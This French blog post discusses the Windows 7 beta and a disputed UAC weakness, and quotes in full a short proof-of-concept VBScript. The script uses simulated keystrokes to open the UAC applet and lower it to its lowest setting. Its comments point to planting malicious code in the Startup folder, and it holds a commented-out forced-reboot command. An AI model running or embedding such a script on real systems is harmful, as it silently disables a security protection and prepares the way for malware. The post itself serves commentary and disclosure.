Windows 7 : le gruyère avec la tapette ?
J’ai été ravi de pouvoir tester Windows 7, il y a quelques semaines, dans sa version beta. A ce propos, pendant que j’y suis, il n’y aura pas de version beta 2, Microsoft passera directement à la Release Candidate. Comme quoi, ils s’activent beaucoup pour donner une suite à Windows XP…
Qu’on ne se le cache pas, je ne suis clairement pas le seul privilégier à avoir pu tâter cet OS, et j’avoue avoir été assez agréablement surpris par son fonctionnement, plutôt léger et malgré tout stable. Je ne suis pas sûr tout de même de changer mon XP actuel pour autant, parce que j’utilise certains pilotes spécifiques (les KX Drivers) qui ne semblent toujours fonctionner que sur cet OS pour mon Audigy 2 ZS. Pour ma part, ces pilotes sont une révolution, couplés à des Gigawork S750. L’ensemble me donne envie de redécouvrir et d’écouter toujours plus de musique, mais là n’est pas le problème, je m’éloigne du sujet.
Non, le problème, c’est que de nouveau, les sempiternelles vulnérabilités de Windows refont surface aussi vite qu’un rat affamé bondissant vers un morceaux de gruyère sur une tapette. Il cours alors, sans le savoir directement à sa perte !
Houla, je vous vois venir. Mais non, je ne dis pas que Microsoft s’enfonce tout droit vers sa fin, surtout pour une simple vulnérabilité. Faut pas exagérer, n’est-ce pas ? Oui, je suis d’accord mais voilà, que se passerait-il si le géant américain décidait de ne pas corriger ses failles ? La question restera donc en suspens, puisque lors de son test, Long Zheng à trouvé une faille concernant le système de protection UAC. Un comble non ? Le pire, c’est que Microsoft semble ignorer le problème sur le fait qu’une application externe puisse changer ou arrêter le comportement de ce système de protection. Selon eux, ce ne serait pas une faille ! Il est probable que rien ne soit « corrigé » à la sortie de la version commerciale.
Le pire, c’est que tout ça se prouve sur une simple petite quinzaine de ligne, simplement mises en évidence par le blog de Rafael.
Aller, histoire de bien déployer le code VB, le voici en citation. Je n’ai bien sûr rien contre Microsoft, mais si, ils pouvaient rassurer leurs clients et trouver une solution simple qui consisterait, par exemple, à empêcher toute action de programmes externes cherchant à modifier l’UAC, ce serait pas mal du tout, parce que les exemples de comportements pas gentils avec ça commencent à pointer le bout du nez. Il serait parait-il possible de faire redémarrer la machine et d’implanter tout un tas de malwares… Franchement, c’est pas comme ça que vous allez le vendre votre Se7en !
‘// 1337H4x Written by _____________
‘// (12 year old)Set WshShell = WScript.CreateObject(« WScript.Shell »)
‘// Toggle Start menu
WshShell.SendKeys(« ^{ESC} »)
WScript.Sleep(500)‘// Search for UAC applet
WshShell.SendKeys(« change uac »)
WScript.Sleep(2000)‘// Open the applet (assuming second result)
WshShell.SendKeys(« {DOWN} »)
WshShell.SendKeys(« {DOWN} »)
WshShell.SendKeys(« {ENTER} »)
WScript.Sleep(2000)‘// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys(« {TAB} »)
WshShell.SendKeys(« {DOWN} »)
WshShell.SendKeys(« {DOWN} »)
WshShell.SendKeys(« {DOWN} »)‘// Save our changes
WshShell.SendKeys(« {TAB} »)
WshShell.SendKeys(« {ENTER} »)‘// TODO: Add code to handle installation of rebound
‘// process to continue exploitation, i.e. place something
‘// evil in Startup folder‘// Reboot the system
‘// WshShell.Run « shutdown /r /f »
